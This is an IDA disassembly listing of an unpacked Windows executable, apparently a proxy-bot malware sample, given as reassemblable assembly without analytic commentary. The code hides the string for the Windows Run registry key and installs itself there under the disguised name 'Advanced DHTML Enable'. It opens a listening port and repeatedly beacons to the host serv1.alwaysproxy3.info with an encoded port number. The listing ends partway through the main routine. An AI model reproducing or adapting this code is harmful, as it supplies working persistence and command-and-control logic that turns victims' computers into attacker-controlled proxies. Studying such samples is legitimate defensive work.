;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 5CD8E33C8EE5971DD6809274D1BF2D26
; File Name : u:\work\5cd8e33c8ee5971dd6809274d1bf2d26_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0011B000 (1159168.)
; Section size in file : 0011B000 (1159168.)
; Offset to raw data for section: 00001000
; Flags C0000020: Text Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_data segment para public 'CODE' use32
assume cs:_data
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_4017F0+DFC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_401010
mov eax, 7
pop esi
retn
; ---------------------------------------------------------------------------
loc_401010: ; CODE XREF: sub_401000+7�j
mov dword ptr [esi+10h], 0
mov dword_409A80, 0
mov ecx, [esi+8]
lea eax, [esi+28h]
push 10h
push eax
push ecx
call sub_40288A
test eax, eax
jz short loc_40106C
call sub_402884
cmp eax, 2748h
jz short loc_40106C
call sub_402884
cmp eax, 2735h
jz short loc_401062
call sub_402884
cmp eax, 2733h
jz short loc_401062
mov eax, 2
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401062: ; CODE XREF: sub_401000+4A�j
; sub_401000+56�j
mov eax, 6
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401000+32�j
; sub_401000+3E�j
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401080 proc near ; CODE XREF: sub_4017F0+742�p
; sub_4017F0+9C0�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
mov edi, 1
test ebx, ebx
mov [esp+10h+var_4], edi
jnz short loc_40109F
pop edi
pop esi
mov eax, 7
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40109F: ; CODE XREF: sub_401080+13�j
push 6
push edi
push 2
mov dword ptr [ebx+10h], 0
mov dword ptr [ebx+24h], 0
call sub_402896
test eax, eax
mov [ebx+8], eax
jge short loc_4010CB
mov eax, 3
pop edi
mov [ebx+0Ch], eax
pop esi
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4010CB: ; CODE XREF: sub_401080+3C�j
mov esi, [esp+10h+arg_4]
push esi
call sub_402866
test eax, eax
jz short loc_4010EF
push esi
call sub_402866
cmp eax, 0FFFFFFFFh
jz short loc_4010EF
push esi
call sub_402866
mov [ebx+2Ch], eax
jmp short loc_40111D
; ---------------------------------------------------------------------------
loc_4010EF: ; CODE XREF: sub_401080+57�j
; sub_401080+62�j
push esi
call sub_402860
test eax, eax
jnz short loc_401103
mov [ebx+0Ch], edi
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401103: ; CODE XREF: sub_401080+77�j
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
mov edx, ecx
lea edi, [ebx+2Ch]
mov esi, [eax]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
loc_40111D: ; CODE XREF: sub_401080+6D�j
mov eax, [esp+10h+arg_8]
mov word ptr [ebx+28h], 2
push eax
call sub_40287E
mov edx, [ebx+8]
lea ecx, [esp+10h+var_4]
push ecx
push 8004667Eh
push edx
mov [ebx+2Ah], ax
call sub_402890
pop edi
mov dword ptr [ebx+0Ch], 0
pop esi
xor eax, eax
pop ebx
pop ecx
retn
sub_401080 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401160 proc near ; CODE XREF: sub_4017F0+3A3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push ebp
push edi
test ebx, ebx
jz short loc_4011D3
mov ebp, [esp+0Ch+arg_4]
test ebp, ebp
jz short loc_4011D3
push esi
mov ecx, 0Fh
mov esi, ebx
mov edi, ebp
mov dword ptr [ebx+10h], 0
lea eax, [esp+10h+arg_0]
rep movsd
mov edx, [ebx+8]
lea ecx, [ebp+28h]
push eax
push ecx
push edx
mov [esp+1Ch+arg_0], 10h
call sub_40289C
test eax, eax
pop esi
jge short loc_4011BC
mov ecx, 0Fh
xor eax, eax
mov edi, ebp
rep stosd
mov eax, 6
pop edi
mov [ebx+0Ch], eax
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4011BC: ; CODE XREF: sub_401160+43�j
mov [ebp+8], eax
mov eax, [esp+0Ch+arg_0]
pop edi
mov [ebx+10h], eax
mov dword ptr [ebx+0Ch], 0
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4011D3: ; CODE XREF: sub_401160+9�j
; sub_401160+11�j
pop edi
pop ebp
mov eax, 7
pop ebx
retn
sub_401160 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011E0 proc near ; CODE XREF: sub_4017F0+254�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push esi
mov esi, [esp+8+arg_0]
test esi, esi
mov [esp+8+var_4], 1
jnz short loc_4011FA
mov eax, 7
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4011FA: ; CODE XREF: sub_4011E0+10�j
push 6
push 1
push 2
mov dword ptr [esi+10h], 0
call sub_402896
test eax, eax
mov [esi+8], eax
jge short loc_40121E
mov eax, 3
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40121E: ; CODE XREF: sub_4011E0+31�j
mov eax, [esp+8+arg_4]
push edi
lea edi, [esi+28h]
push eax
mov dword ptr [esi+2Ch], 0
mov word ptr [edi], 2
call sub_40287E
mov ecx, [esi+8]
push 10h
push edi
push ecx
mov [esi+2Ah], ax
call sub_402878
test eax, eax
pop edi
jge short loc_401258
mov eax, 4
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401258: ; CODE XREF: sub_4011E0+6B�j
mov edx, [esi+8]
push 47D2h
push edx
call sub_4028A2
test eax, eax
jge short loc_401275
mov eax, 5
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401275: ; CODE XREF: sub_4011E0+88�j
mov ecx, [esi+8]
lea eax, [esp+8+var_4]
push eax
push 8004667Eh
push ecx
call sub_402890
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
pop ecx
retn
sub_4011E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4012A0 proc near ; CODE XREF: sub_4013E0+8D�p
; sub_4017F0+49D�p ...
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 110h
push ebx
mov ebx, [esp+114h+arg_0]
push ebp
push esi
test ebx, ebx
push edi
mov [esp+120h+var_108], 0
jnz short loc_4012CD
pop edi
pop esi
pop ebp
mov eax, 7
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4012CD: ; CODE XREF: sub_4012A0+1B�j
mov eax, [ebx+24h]
mov esi, [esp+120h+arg_8]
add eax, esi
push eax
call sub_4028C6
mov ebp, eax
add esp, 4
test ebp, ebp
jz loc_4013D5
mov edi, [ebx+24h]
mov ecx, esi
mov esi, [esp+120h+arg_4]
mov edx, ecx
add edi, ebp
shr ecx, 2
rep movsd
mov ecx, edx
xor edx, edx
and ecx, 3
rep movsb
mov esi, [ebx+1Ch]
cmp esi, edx
jz short loc_401340
mov ecx, [ebx+24h]
mov edi, ebp
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebx+1Ch]
cmp eax, edx
jz short loc_40133D
push eax
call sub_402B18
add esp, 4
mov dword ptr [ebx+1Ch], 0
xor edx, edx
loc_40133D: ; CODE XREF: sub_4012A0+89�j
mov [ebx+1Ch], edx
loc_401340: ; CODE XREF: sub_4012A0+6F�j
mov esi, [esp+120h+arg_8]
mov eax, [ebx+24h]
xor ecx, ecx
add esi, eax
mov eax, [ebx+8]
mov [esp+120h+var_110], ecx
mov [esp+120h+var_10C], ecx
lea ecx, [esp+120h+var_110]
push ecx
lea ecx, [esp+124h+var_104]
mov [esp+124h+var_100], eax
push edx
push ecx
inc eax
push edx
push eax
mov [ebx+24h], edx
mov [esp+134h+var_104], 1
mov [esp+134h+var_110], edx
mov [esp+134h+var_10C], edx
call sub_402872
test eax, eax
jle short loc_4013A4
xor edi, edi
mov [ebx+10h], edi
mov dword_409A80, edi
mov edx, [ebx+8]
push edi
push esi
push ebp
push edx
call sub_4028A8
cmp eax, esi
jnb short loc_4013C4
jmp short loc_4013A8
; ---------------------------------------------------------------------------
loc_4013A4: ; CODE XREF: sub_4012A0+E5�j
mov eax, [esp+120h+var_108]
loc_4013A8: ; CODE XREF: sub_4012A0+102�j
mov [ebx+10h], eax
mov [ebx+24h], esi
mov eax, 6
pop edi
mov [ebx+1Ch], ebp
pop esi
mov [ebx+0Ch], eax
pop ebp
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4013C4: ; CODE XREF: sub_4012A0+100�j
push ebp
mov [ebx+10h], eax
mov [ebx+0Ch], edi
call sub_402B18
add esp, 4
xor eax, eax
loc_4013D5: ; CODE XREF: sub_4012A0+46�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 110h
retn
sub_4012A0 endp
; =============== S U B R O U T I N E =======================================
sub_4013E0 proc near ; CODE XREF: sub_4017F0+E80�p
; sub_4017F0+F3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
push edi
mov esi, 0BBBh
loc_4013E7: ; CODE XREF: sub_4013E0+72�j
mov eax, dword_409A74
test eax, eax
jz short loc_401403
push eax
call sub_402B18
add esp, 4
mov dword_409A74, 0
loc_401403: ; CODE XREF: sub_4013E0+E�j
lea eax, [esi+1]
push eax
call sub_4028C6
mov edi, eax
add esp, 4
test edi, edi
mov dword_409A74, edi
jz short loc_401498
mov ecx, esi
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
lea edx, [esi-2]
and ecx, 3
rep stosb
mov ecx, [esp+8+arg_4]
lea eax, [esp+8+arg_8]
push eax
mov eax, dword_409A74
push ecx
push edx
push eax
call sub_402B47
add esp, 10h
add esi, 3E8h
cmp eax, 0FFFFFFFFh
jz short loc_4013E7
mov edx, dword_409A74
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
mov ecx, [esp+0Ch+arg_0]
push edx
push ecx
call sub_4012A0
mov esi, eax
mov eax, dword_409A74
add esp, 0Ch
test eax, eax
jz short loc_401493
push eax
call sub_402B18
add esp, 4
mov dword_409A74, 0
loc_401493: ; CODE XREF: sub_4013E0+9E�j
mov eax, esi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_401498: ; CODE XREF: sub_4013E0+39�j
pop edi
xor eax, eax
pop esi
retn
sub_4013E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014A0 proc near ; CODE XREF: sub_4017F0+4DC�p
; sub_4017F0+C43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
push edi
jnz short loc_4014B2
pop edi
mov eax, 7
pop esi
retn
; ---------------------------------------------------------------------------
loc_4014B2: ; CODE XREF: sub_4014A0+8�j
mov edi, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
mov ecx, [esi+8]
push 0
push edi
push eax
push ecx
mov dword ptr [esi+10h], 0
call sub_4028AE
test eax, eax
jge short loc_4014E9
call sub_402884
cmp eax, 2734h
jnz short loc_4014EF
mov eax, 6
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4014E9: ; CODE XREF: sub_4014A0+30�j
jnz short loc_4014FA
test edi, edi
jz short loc_4014FA
loc_4014EF: ; CODE XREF: sub_4014A0+3C�j
mov eax, 8
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4014FA: ; CODE XREF: sub_4014A0:loc_4014E9�j
; sub_4014A0+4D�j
mov [esi+10h], eax
mov dword ptr [esi+0Ch], 0
pop edi
xor eax, eax
pop esi
retn
sub_4014A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401510 proc near ; CODE XREF: sub_401790+26�p
; sub_401790+3E�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
cmp edi, esi
jnz short loc_401524
pop edi
mov eax, 7
pop esi
retn
; ---------------------------------------------------------------------------
loc_401524: ; CODE XREF: sub_401510+A�j
mov eax, [edi+8]
mov [edi+10h], esi
push eax
call sub_4028B4
test eax, eax
jge short loc_40153F
mov eax, 8
mov [edi+0Ch], eax
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40153F: ; CODE XREF: sub_401510+22�j
mov eax, [edi+1Ch]
mov [edi+8], esi
cmp eax, esi
mov [edi+0Ch], esi
jz short loc_401558
push eax
call sub_402B18
add esp, 4
mov [edi+1Ch], esi
loc_401558: ; CODE XREF: sub_401510+3A�j
mov eax, [edi+20h]
cmp eax, esi
jz short loc_40156B
push eax
call sub_402B18
add esp, 4
mov [edi+20h], esi
loc_40156B: ; CODE XREF: sub_401510+4D�j
mov ecx, 0Fh
xor eax, eax
rep stosd
pop edi
pop esi
retn
sub_401510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401580 proc near ; CODE XREF: sub_4016E0+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
push esi
jnz short loc_401592
pop esi
mov eax, 7
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401592: ; CODE XREF: sub_401580+8�j
push 11h
push 2
push 2
mov dword ptr [ebx+10h], 0
call sub_402896
test eax, eax
mov [ebx+8], eax
jge short loc_4015B6
mov eax, 3
pop esi
mov [ebx+0Ch], eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4015B6: ; CODE XREF: sub_401580+29�j
mov esi, [esp+8+arg_4]
push esi
call sub_402866
test eax, eax
jz short loc_4015DA
push esi
call sub_402866
cmp eax, 0FFFFFFFFh
jz short loc_4015DA
push esi
call sub_402866
mov [ebx+2Ch], eax
jmp short loc_40160B
; ---------------------------------------------------------------------------
loc_4015DA: ; CODE XREF: sub_401580+42�j
; sub_401580+4D�j
push esi
call sub_402860
test eax, eax
jnz short loc_4015EF
mov eax, 1
pop esi
mov [ebx+0Ch], eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4015EF: ; CODE XREF: sub_401580+62�j
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
mov edx, ecx
push edi
lea edi, [ebx+2Ch]
mov esi, [eax]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
loc_40160B: ; CODE XREF: sub_401580+58�j
mov eax, [esp+8+arg_8]
mov word ptr [ebx+28h], 2
push eax
call sub_40287E
mov [ebx+2Ah], ax
mov dword ptr [ebx+0Ch], 0
pop esi
xor eax, eax
pop ebx
retn
sub_401580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401630 proc near ; CODE XREF: sub_4016E0+8D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_401640
mov eax, 7
pop esi
retn
; ---------------------------------------------------------------------------
loc_401640: ; CODE XREF: sub_401630+7�j
mov ecx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
lea eax, [esi+28h]
push 10h
mov dword ptr [esi+10h], 0
push eax
mov dword_409A80, 0
mov eax, [esi+8]
push 0
push ecx
push edx
push eax
call sub_4028BA
test eax, eax
jg short loc_401690
call sub_402884
cmp eax, 2734h
jnz short loc_401686
mov eax, 6
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401686: ; CODE XREF: sub_401630+4A�j
mov eax, 8
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401690: ; CODE XREF: sub_401630+3E�j
mov [esi+10h], eax
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401630 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016A0 proc near ; CODE XREF: sub_4016E0+97�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4016B0
mov eax, 7
pop esi
retn
; ---------------------------------------------------------------------------
loc_4016B0: ; CODE XREF: sub_4016A0+7�j
mov eax, [esi+8]
mov dword ptr [esi+10h], 0
push eax
call sub_4028B4
test eax, eax
jge short loc_4016CE
mov eax, 8
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4016CE: ; CODE XREF: sub_4016A0+22�j
mov dword ptr [esi+8], 0
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_4016A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4016E0 proc near ; DATA XREF: sub_4017F0+26B�o
var_13C = byte ptr -13Ch
var_100 = byte ptr -100h
sub esp, 13Ch
push esi
mov esi, dword_40804C
push edi
loc_4016EE: ; CODE XREF: sub_4016E0+A6�j
push 47D2h
lea eax, [esp+148h+var_13C]
push offset aServ1_alwayspr ; "serv1.alwaysproxy3.info"
push eax
call sub_401580
add esp, 0Ch
test eax, eax
jnz short loc_40177F
xor ecx, ecx
lea edx, [esp+144h+var_100]
mov cx, word_409D0C
push ecx
push offset dword_409030
push edx
call sub_402B97
lea edi, [esp+150h+var_100]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 0Ch
xor edx, edx
repne scasb
not ecx
dec ecx
jz short loc_401754
loc_401737: ; CODE XREF: sub_4016E0+72�j
mov al, [esp+edx+144h+var_100]
lea edi, [esp+144h+var_100]
shl al, 1
mov [esp+edx+144h+var_100], al
or ecx, 0FFFFFFFFh
xor eax, eax
inc edx
repne scasb
not ecx
dec ecx
cmp edx, ecx
jb short loc_401737
loc_401754: ; CODE XREF: sub_4016E0+55�j
lea edi, [esp+144h+var_100]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esp+144h+var_13C]
repne scasb
not ecx
dec ecx
push ecx
lea ecx, [esp+148h+var_100]
push ecx
push edx
call sub_401630
lea eax, [esp+150h+var_13C]
push eax
call sub_4016A0
add esp, 10h
loc_40177F: ; CODE XREF: sub_4016E0+27�j
push 0DBBA0h
call esi
jmp loc_4016EE
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401790 proc near ; CODE XREF: .data:0040282D�p
var_10C = byte ptr -10Ch
var_100 = byte ptr -100h
sub esp, 100h
lea eax, [esp+100h+var_100]
push esi
push 100h
push eax
push 0
call dword_408054
mov esi, offset dword_409D20
loc_4017AE: ; CODE XREF: sub_401790+37�j
mov eax, [esi+8]
test eax, eax
jle short loc_4017BE
push esi
call sub_401510
add esp, 4
loc_4017BE: ; CODE XREF: sub_401790+23�j
add esi, 3Ch
cmp esi, offset dword_517258
jl short loc_4017AE
push offset dword_517260
call sub_401510
add esp, 4
lea ecx, [esp+110h+var_10C]
push 0
push ecx
call dword_408050
push 0
call sub_402967
pop esi
nop
nop
nop
nop
nop
sub_401790 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4017F0 proc near ; CODE XREF: .data:00402FA9�p
var_22E8 = dword ptr -22E8h
var_22E4 = dword ptr -22E4h
var_22E0 = dword ptr -22E0h
var_22DC = dword ptr -22DCh
var_22D8 = dword ptr -22D8h
var_22D4 = dword ptr -22D4h
var_22D0 = byte ptr -22D0h
var_12D0 = dword ptr -12D0h
var_12CC = dword ptr -12CCh
var_12C8 = byte ptr -12C8h
var_11C8 = dword ptr -11C8h
var_11C4 = dword ptr -11C4h
var_11C0 = byte ptr -11C0h
var_10C0 = dword ptr -10C0h
var_10BC = dword ptr -10BCh
var_FBC = dword ptr -0FBCh
var_FB8 = dword ptr -0FB8h
var_EB8 = dword ptr -0EB8h
var_EB4 = dword ptr -0EB4h
var_EB0 = dword ptr -0EB0h
var_EAB = byte ptr -0EABh
var_EAA = byte ptr -0EAAh
var_EA9 = dword ptr -0EA9h
var_2F4 = byte ptr -2F4h
var_1F4 = byte ptr -1F4h
var_1F3 = byte ptr -1F3h
var_1F2 = byte ptr -1F2h
var_1F1 = byte ptr -1F1h
var_1F0 = byte ptr -1F0h
var_1EF = byte ptr -1EFh
var_1EE = byte ptr -1EEh
var_1ED = byte ptr -1EDh
var_1EC = byte ptr -1ECh
var_1EB = byte ptr -1EBh
var_1EA = byte ptr -1EAh
var_1E9 = byte ptr -1E9h
var_1E8 = byte ptr -1E8h
var_1E7 = byte ptr -1E7h
var_1E6 = byte ptr -1E6h
var_1E5 = byte ptr -1E5h
var_1E4 = byte ptr -1E4h
var_1E3 = byte ptr -1E3h
var_1E2 = byte ptr -1E2h
var_1E1 = byte ptr -1E1h
var_1E0 = byte ptr -1E0h
var_1DF = byte ptr -1DFh
var_1DE = byte ptr -1DEh
var_1DD = byte ptr -1DDh
var_1DC = byte ptr -1DCh
var_1DB = byte ptr -1DBh
var_1DA = byte ptr -1DAh
var_1D9 = byte ptr -1D9h
var_1D8 = byte ptr -1D8h
var_1D7 = byte ptr -1D7h
var_1D6 = byte ptr -1D6h
var_1D5 = byte ptr -1D5h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D2 = byte ptr -1D2h
var_1D1 = byte ptr -1D1h
var_1D0 = byte ptr -1D0h
var_1CF = byte ptr -1CFh
var_1CE = byte ptr -1CEh
var_1CD = byte ptr -1CDh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_1CA = byte ptr -1CAh
var_1C9 = byte ptr -1C9h
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_1C4 = byte ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1AC = byte ptr -1ACh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_408128
push offset sub_402E08
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
mov eax, 22D0h
call sub_402CE0
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
mov [ebp+var_1F4], 53h
mov [ebp+var_1F3], 4Fh
mov [ebp+var_1F2], 46h
mov [ebp+var_1F1], 54h
mov al, 57h
mov [ebp+var_1F0], al
mov [ebp+var_1EF], 41h
mov [ebp+var_1EE], 52h
mov [ebp+var_1ED], 45h
mov bl, 5Ch
mov [ebp+var_1EC], bl
mov [ebp+var_1EB], 4Dh
mov [ebp+var_1EA], 69h
mov [ebp+var_1E9], 63h
mov dl, 72h
mov [ebp+var_1E8], dl
mov cl, 6Fh
mov [ebp+var_1E7], cl
mov [ebp+var_1E6], 73h
mov [ebp+var_1E5], cl
mov [ebp+var_1E4], 66h
mov [ebp+var_1E3], 74h
mov [ebp+var_1E2], bl
mov [ebp+var_1E1], al
mov [ebp+var_1E0], 69h
mov al, 6Eh
mov [ebp+var_1DF], al
mov [ebp+var_1DE], 64h
mov [ebp+var_1DD], cl
mov [ebp+var_1DC], 77h
mov [ebp+var_1DB], 73h
mov [ebp+var_1DA], bl
mov [ebp+var_1D9], 43h
mov [ebp+var_1D8], 75h
mov [ebp+var_1D7], dl
mov [ebp+var_1D6], dl
mov [ebp+var_1D5], 65h
mov [ebp+var_1D4], al
mov [ebp+var_1D3], 74h
mov [ebp+var_1D2], 56h
mov [ebp+var_1D1], 65h
mov [ebp+var_1D0], dl
mov [ebp+var_1CF], 73h
mov [ebp+var_1CE], 69h
mov [ebp+var_1CD], cl
mov [ebp+var_1CC], al
mov [ebp+var_1CB], bl
mov [ebp+var_1CA], 52h
mov [ebp+var_1C9], 75h
mov [ebp+var_1C8], al
mov [ebp+var_1C7], 0
lea eax, [ebp+var_1C0]
push eax
push 20006h
push 0
lea ecx, [ebp+var_1F4]
push ecx
push 80000002h
call dword_408004
test eax, eax
jnz short loc_4019C5
push 100h
lea edx, [ebp+var_2F4]
push edx
push eax
call dword_408054
lea edi, [ebp+var_2F4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
push ecx
lea eax, [ebp+var_2F4]
push eax
push 1
push 0
push offset aAdvancedDhtmlE ; "Advanced DHTML Enable"
mov ecx, [ebp+var_1C0]
push ecx
call dword_408000
loc_4019C5: ; CODE XREF: sub_4017F0+193�j
lea edx, [ebp+var_1AC]
push edx
push 202h
call sub_4028C0
push 0
call sub_402A3C
add esp, 4
mov esi, eax
call dword_40805C
imul esi, eax
push esi
call sub_402CB8
add esp, 4
mov ecx, 0Fh
xor eax, eax
mov edi, offset dword_517260
rep stosd
mov ecx, 4354Eh
mov edi, offset dword_409D20
rep stosd
mov esi, dword_40804C
loc_401A14: ; CODE XREF: sub_4017F0+25E�j
call sub_402CC2
cdq
mov ecx, 0FBFDh
idiv ecx
add edx, 401h
mov word_409D0C, dx
push 3E8h
call esi
xor edx, edx
mov dx, word_409D0C
push edx
push offset dword_517260
call sub_4011E0
add esp, 8
test eax, eax
jnz short loc_401A14
lea eax, [ebp+var_1C4]
push eax
push 0
push 0
push offset sub_4016E0
push 0
push 0
call dword_408058
loc_401A6A: ; CODE XREF: sub_4017F0+3D4�j
xor edi, edi
mov [ebp+var_10C0], edi
mov [ebp+var_FBC], edi
mov eax, dword_517268
mov [ebp+var_10BC], eax
mov ebx, 1
mov [ebp+var_10C0], ebx
mov esi, eax
mov [ebp+var_1BC], esi
xor edx, edx
loc_401A98: ; CODE XREF: sub_4017F0+311�j
mov [ebp+var_1B8], edx
cmp edx, 47D2h
jnb short loc_401B03
lea eax, [edx+edx*2]
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, dword_409D28[eax]
test ecx, ecx
jle short loc_401B00
cmp ebx, 40h
jnb short loc_401AD2
mov [ebp+ebx*4+var_10BC], ecx
mov ebx, [ebp+var_10C0]
inc ebx
mov [ebp+var_10C0], ebx
loc_401AD2: ; CODE XREF: sub_4017F0+2CC�j
cmp dword_409D3C[eax], 0
jz short loc_401AF4
cmp edi, 40h
jnb short loc_401AF4
mov [ebp+edi*4+var_FB8], ecx
mov edi, [ebp+var_FBC]
inc edi
mov [ebp+var_FBC], edi
loc_401AF4: ; CODE XREF: sub_4017F0+2E9�j
; sub_4017F0+2EE�j
cmp ecx, esi
jbe short loc_401B00
mov esi, ecx
mov [ebp+var_1BC], esi
loc_401B00: ; CODE XREF: sub_4017F0+2C7�j
; sub_4017F0+306�j
inc edx
jmp short loc_401A98
; ---------------------------------------------------------------------------
loc_401B03: ; CODE XREF: sub_4017F0+2B4�j
xor ecx, ecx
mov [ebp+var_EB8], ecx
mov [ebp+var_EB4], ecx
mov [ebp+var_EB8], 2
mov [ebp+var_EB4], ecx
lea edx, [ebp+var_EB8]
push edx
push ecx
lea eax, [ebp+var_FBC]
push eax
lea ecx, [ebp+var_10C0]
push ecx
inc esi
push esi
call sub_402872
mov ecx, 2EEh
xor eax, eax
lea edi, [ebp+var_EB0]
rep stosd
stosb
lea edx, [ebp+var_10C0]
push edx
mov eax, dword_517268
push eax
call sub_40286C
test eax, eax
jz short loc_401BB7
xor ebx, ebx
loc_401B66: ; CODE XREF: sub_4017F0+3C5�j
mov [ebp+var_1B8], ebx
cmp ebx, 47D2h
jnb short loc_401BB7
lea eax, [ebx+ebx*2]
lea esi, [eax+eax*4]
shl esi, 2
mov eax, dword_409D28[esi]
test eax, eax
jnz short loc_401BB4
lea edi, dword_409D20[esi]
push edi
push offset dword_517260
call sub_401160
add esp, 8
test eax, eax
jnz short loc_401BB7
push eax
call sub_402A3C
add esp, 4
mov dword_409D38[esi], eax
mov dword ptr [edi], 1
loc_401BB4: ; CODE XREF: sub_4017F0+395�j
inc ebx
jmp short loc_401B66
; ---------------------------------------------------------------------------
loc_401BB7: ; CODE XREF: sub_4017F0+372�j
; sub_4017F0+382�j ...
xor eax, eax
